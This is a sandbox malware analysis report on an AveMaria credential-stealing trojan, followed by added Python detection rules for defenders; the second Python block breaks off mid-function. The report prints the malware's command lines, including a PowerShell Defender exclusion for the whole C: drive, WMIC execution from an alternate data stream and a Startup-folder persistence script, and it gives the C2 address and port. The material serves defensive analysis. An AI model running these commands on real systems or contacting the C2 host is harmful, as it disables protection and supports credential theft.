
Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.7507

Overview

General Information

Sample Name: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.7507 (renamed file extension from 7507 to exe)
Analysis ID: 631792
MD5: dabc6f0c75c134e5310ba3526adba833
SHA1: 854ec103a64182c97e8f25e45da04889dbbbf3ff
SHA256: 9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf
Tags: exe

Detection

AveMaria, UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Creates processes via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
Drops script or batch files to the startup folder
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Contains functionality to create processes via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Hides user accounts
Contains functionality to steal e-mail passwords
Found evasive API chain checking for user administrative privileges
Contains functionality to steal Chrome passwords or cookies
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates files in alternative data streams (ADS)
Found decision node followed by non-executed suspicious APIs
Contains functionality to create new users
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains functionality to download and execute PE files
Creates a start menu entry (Start Menu\Programs\Startup)
Spawns drivers
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Contains capabilities to detect virtual machines
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe (PID: 6324 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe" MD5: DABC6F0C75C134E5310BA3526ADBA833)
    • powershell.exe (PID: 6368 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • images.exe (PID: 6516 cmdline: C:\ProgramData\images.exe MD5: DABC6F0C75C134E5310BA3526ADBA833)
      • powershell.exe (PID: 6732 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6840 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 6832 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 7004 cmdline: wmic process call create '"C:\ProgramData:ApplicationData"' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  • rdpdr.sys (PID: 4 cmdline: MD5: 52A6CC99F5934CFAE88353C47B6193E7)
  • tsusbhub.sys (PID: 4 cmdline: MD5: 3A84A09CBC42148A0C7D00B3E82517F1)
  • WmiPrvSE.exe (PID: 6700 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • WmiPrvSE.exe (PID: 6984 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • cleanup
Malware Configuration (AveMaria): {"C2 url": "23.227.202.157", "port": 8080}
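The process tree above shows three things a detection engineer would want to alert on: Windows Defender being told to exclude the whole C:\ drive, WMIC creating a process from an NTFS alternate data stream (C:\ProgramData:ApplicationData), and cmd.exe running a .bat dropped into the user's Startup folder. The following Python is an added example, not part of the Joe Sandbox report, that runs those rules over constructed process-creation records modelled on the tree (Sysmon Event ID 1 style fields; the full paths assumed for powershell.exe, cmd.exe and WMIC.exe are not stated in the report):

```python
import re

# Constructed process-creation records modelled on the process tree in the
# report (the fields a Sysmon Event ID 1 consumer would have). Sample input
# for this example only; the image paths of the system binaries are assumed.
EVENTS = [
    {"pid": 6324,
     "image": r"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe",
     "cmdline": r'"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe"'},
    {"pid": 6368,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Add-MpPreference -ExclusionPath C:\\"},
    {"pid": 6376,
     "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 6516,
     "image": r"C:\ProgramData\images.exe",
     "cmdline": r"C:\ProgramData\images.exe"},
    {"pid": 6832,
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "'},
    {"pid": 7004,
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"""wmic process call create '"C:\ProgramData:ApplicationData"'"""},
]

# Add-MpPreference -ExclusionPath <path>: the value is captured so that a
# whole-drive exclusion (what this sample does) is rated above a narrow one.
DEFENDER_EXCLUSION = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+([^\s,]+)", re.I)

# <drive>:\<path>:<stream>, an NTFS alternate data stream used as a program
# path. The path part excludes ':' so ordinary paths and URLs do not match.
ADS_PATH = re.compile(r"[A-Za-z]:\\[^\s\"':]*:[^\s\"'\\:]+")

# A script in the per-user Startup folder being handed to an interpreter.
STARTUP_SCRIPT = re.compile(
    r"\\Start Menu\\Programs\\Startup\\[^\s\"']+\.(?:bat|cmd|vbs|js|ps1)\b", re.I)

BROAD_EXCLUSIONS = {"c:\\users", "c:\\windows", "c:\\programdata", "c:\\program files"}


def is_broad_exclusion(path):
    """True for a drive root or a top-level system directory."""
    p = path.strip("\"'").rstrip("\\").lower()
    return re.fullmatch(r"[a-z]:", p) is not None or p in BROAD_EXCLUSIONS


def detect(events):
    """Return (pid, rule, severity) tuples for the events that match a rule."""
    findings = []
    for ev in events:
        exe = ev["image"].rsplit("\\", 1)[-1].lower()
        cmd = ev["cmdline"]
        m = DEFENDER_EXCLUSION.search(cmd)
        if exe in ("powershell.exe", "pwsh.exe") and m:
            sev = "high" if is_broad_exclusion(m.group(1)) else "medium"
            findings.append((ev["pid"], "defender_exclusion", sev))
        if ADS_PATH.search(cmd):
            # Zone.Identifier streams appear in some admin tooling command
            # lines; an ADS given to a process-creation primitive is not that.
            findings.append((ev["pid"], "ads_execution", "high"))
        if STARTUP_SCRIPT.search(cmd):
            findings.append((ev["pid"], "startup_script", "medium"))
        low = ev["image"].lower()
        # An executable sitting directly in the ProgramData root (not in a
        # vendor subfolder) is unusual enough to record at low severity.
        if low.startswith("c:\\programdata\\") and low.count("\\") == 2:
            findings.append((ev["pid"], "programdata_root_exec", "low"))
    return findings


if __name__ == "__main__":
    for pid, rule, sev in detect(EVENTS):
        print(f"pid {pid}: {rule} [{sev}]")
```

The exclusion rule grades a whole-drive exclusion as high and anything narrower as medium; on a live host, Get-MpPreference shows whether the exclusion actually took effect, which the sandbox run does not record.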
Source | Rule | Description | Author (matched strings listed beneath each entry)
00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x178c8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x178c8:$c1: Elevation:Administrator!new:
00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdf0:$c1: Elevation:Administrator!new:
(5 of 42 entries shown)

Source | Rule | Description | Author (matched strings listed beneath each entry)
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xd80:$c1: Elevation:Administrator!new:
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack | Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack | Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
  • 0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x191f0:$c1: Elevation:Administrator!new:
(5 of 81 entries shown)

Sigma Overview

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, ProcessId: 6324, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat

Snort IDS Alerts Overview

Timestamp: 05/22/22-12:33:29.604971
Source IP: 192.168.2.3
Destination IP: 23.227.202.157
Source Port: 49740
Destination Port: 8080
SID: 2834979
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/22/22-12:33:29.434739
Source IP: 23.227.202.157
Destination IP: 192.168.2.3
Source Port: 8080
Destination Port: 49740
SID: 2841903
Protocol: TCP
Classtype: A Network Trojan was detected

          AV Detection

Source: C:\Program Files\Microsoft DN1\sqlmap.dll | Avira: detection malicious, Label: PUA/Remoteadmin.AR
Source: 4.2.images.exe.22e053f.3.raw.unpack | Malware Configuration Extractor: AveMaria {"C2 url": "23.227.202.157", "port": 8080}
Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | ReversingLabs: Detection: 24%
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Program Files\Microsoft DN1\sqlmap.dll | Virustotal: Detection: 49%
Source: C:\Program Files\Microsoft DN1\sqlmap.dll | Metadefender: Detection: 20%
Source: C:\Program Files\Microsoft DN1\sqlmap.dll | ReversingLabs: Detection: 50%
Source: C:\ProgramData:ApplicationData | ReversingLabs: Detection: 24%
Source: C:\ProgramData\images.exe | ReversingLabs: Detection: 24%
Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Joe Sandbox ML: detected
Source: C:\ProgramData:ApplicationData | Joe Sandbox ML: detected
Source: C:\ProgramData\images.exe | Joe Sandbox ML: detected
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack | Avira: Label: TR/Redcap.ghjpt
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.2.unpack | Avira: Label: TR/Patched.Ren.Gen3
Source: 4.3.images.exe.732cb8.3.unpack | Avira: Label: TR/Patched.Ren.Gen3
Source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack | Avira: Label: TR/Patched.Ren.Gen3
Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.6.unpack | Avira: Label: TR/Patched.Ren.Gen3
Source: 4.3.images.exe.732cb8.7.unpack | Avira: Label: TR/Patched.Ren.Gen3
Source: 4.2.images.exe.22e053f.3.unpack | Avira: Label: TR/Patched.Ren.Gen3
Source: 4.2.images.exe.2ce0000.4.unpack | Avira: Label: TR/Redcap.ghjpt
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1CAFC CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1B15E lstrlenA,CryptStringToBinaryA,lstrcpyA,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1A632 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1CF58 LocalAlloc,BCryptDecrypt,LocalFree,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1CCB4 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1CC54 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,

          Exploits

Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.23289af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.images.exe.75db48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.images.exe.75db48.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.75ed00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe PID: 6324, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: images.exe PID: 6516, type: MEMORYSTR
Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Directory created: C:\Program Files\Microsoft DN1
Source: C:\ProgramData\images.exe | Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll
Source: C:\ProgramData\images.exe | Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb | source: images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuser32.pdb | source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wuser32.pdbUGP | source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D2002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0040FD34 FindFirstFileExA,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_0040FE55 FindFirstFileExA,FindClose,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1FF27 FindFirstFileW,FindNextFileW,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D19DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,

          Networking

Source: Traffic | Snort IDS: 2841903 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 23.227.202.157:8080 -> 192.168.2.3:49740
Source: Traffic | Snort IDS: 2834979 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.3:49740 -> 23.227.202.157:8080
Source: Malware configuration extractor | URLs: 23.227.202.157
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D127D3 URLDownloadToFileW,ShellExecuteW,
Source: Joe Sandbox View | ASN Name: HVC-ASUS
Source: global traffic | TCP traffic: 192.168.2.3:49740 -> 23.227.202.157:8080
Source: powershell.exe, 00000006.00000003.407047557.00000000076DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000001.00000003.377239509.00000000075FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.384190535.00000000075FB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000006.00000002.409298369.00000000044C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: sqlmap.dll.4.dr | String found in binary or memory: http://stascorp.comDVarFileInfo$
Source: powershell.exe, 00000001.00000003.342861149.0000000008D06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe | Code function: 0_2_02D1F23D recv,recv,
Source: unknown | TCP traffic detected without corresponding DNS query: 23.227.202.157 (50 such events in the report, all to this one address)
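Two of the Networking findings combine well in hunting: the sample's traffic went straight to 23.227.202.157:8080 with no DNS query beforehand, and that address and port are exactly what the configuration extractor pulled out of memory. The Python below is an added example, not the report's own, that correlates a constructed flow log (the C2 flow copied from the report, the other entries invented) with DNS answers and with the extracted config. It assumes the config keys as the extractor printed them and treats RFC 1918, loopback and link-local destinations as not needing DNS:

```python
import ipaddress

# C2 endpoint exactly as the report's configuration extractor printed it.
AVEMARIA_CONFIG = {"C2 url": "23.227.202.157", "port": 8080}

# Ranges a host legitimately talks to without DNS; anything else reached
# without a preceding DNS answer deserves a look.
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
               "127.0.0.0/8", "169.254.0.0/16")]
COMMON_PORTS = {25, 53, 80, 123, 143, 443, 465, 587, 993, 995}

# Constructed flow log in time order (seconds since start). The C2 flow
# mirrors the report (192.168.2.3:49740 -> 23.227.202.157:8080); the DNS
# answer and the other two flows are invented to exercise the rules.
EVENTS = [
    {"t": 0.0, "type": "dns", "qname": "crl.microsoft.com", "answers": ["192.0.2.10"]},
    {"t": 1.2, "type": "conn", "src": "192.168.2.3", "sport": 49735, "dst": "192.0.2.10", "dport": 80},
    {"t": 2.0, "type": "conn", "src": "192.168.2.3", "sport": 49738, "dst": "192.168.2.1", "dport": 445},
    {"t": 9.4, "type": "conn", "src": "192.168.2.3", "sport": 49740, "dst": "23.227.202.157", "dport": 8080},
    {"t": 40.1, "type": "conn", "src": "192.168.2.3", "sport": 49741, "dst": "23.227.202.157", "dport": 8080},
]


def config_endpoint(cfg):
    """(host, port, is_literal_ip) from an extracted AveMaria config.

    The C2 field may hold a hostname or, as here, a bare IP; a literal IP
    never produces a DNS query, which matters for the rules below."""
    host = cfg["C2 url"].strip()
    try:
        ipaddress.ip_address(host)
        literal = True
    except ValueError:
        literal = False
    return host, int(cfg["port"]), literal


def is_local(ip):
    return any(ip in net for net in LOCAL_NETS)


def analyze(events, cfg):
    """Return (sport, dst, dport, reasons) for every flow that needs attention."""
    host, port, literal = config_endpoint(cfg)
    resolved = set()          # IPs seen in DNS answers so far
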